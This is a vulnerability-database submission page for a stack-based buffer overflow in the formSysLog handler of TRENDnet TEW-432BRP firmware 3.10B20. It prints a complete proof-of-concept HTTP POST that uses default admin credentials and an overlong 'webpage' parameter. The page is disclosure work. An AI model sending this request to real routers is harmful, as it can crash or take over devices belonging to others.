提出 #814769: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow情報

タイトルTRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
説明In formSysLog function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSysLog HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 839 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/status_log.asp?t=1777345781756 Upgrade-Insecure-Requests: 1 current_page=0&clear=Clear+Log&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ソース⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_12/12.md
ユーザー
 pjq_Buoy (UID 97666)
送信2026年04月28日 09:12 (1 月 ago)
モデレーション2026年05月30日 09:00 (1 month later)
ステータス承諾済み
VulDBエントリ367412 [TRENDnet TEW-432BRP 3.10B20 /goform/formSysLog current_page メモリ破損]
ポイント20

概要

Interested in the pricing of exploits?

See the underground prices here!